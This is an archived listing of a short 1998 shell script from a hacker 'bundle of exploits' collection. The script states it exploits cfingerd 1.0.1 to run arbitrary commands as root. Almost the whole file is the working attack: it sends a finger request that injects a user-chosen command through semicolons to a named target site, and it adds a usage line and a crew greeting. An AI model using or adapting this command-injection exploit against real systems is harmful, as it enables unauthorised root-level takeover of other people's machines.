home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / cfexec.sh < prev    next >
Text File  |  1998-07-17  |  241b  |  14 lines

  1. # this exploits cfingerd 1.0.1
  2. # l0ck r0x w1f gl0x
  3. # written by east <east@l0ck.com>  
  4. # execute arbitrary commands as root.
  5.  
  6. echo "l0ck r0x w1f gl0x"
  7.  
  8. if [ $# = 2 ]
  9. then
  10.   finger "/W;$1;#@$2"   
  11. else
  12.   echo "$0 \"<command>\" <sitename>"
  13. fi
  14.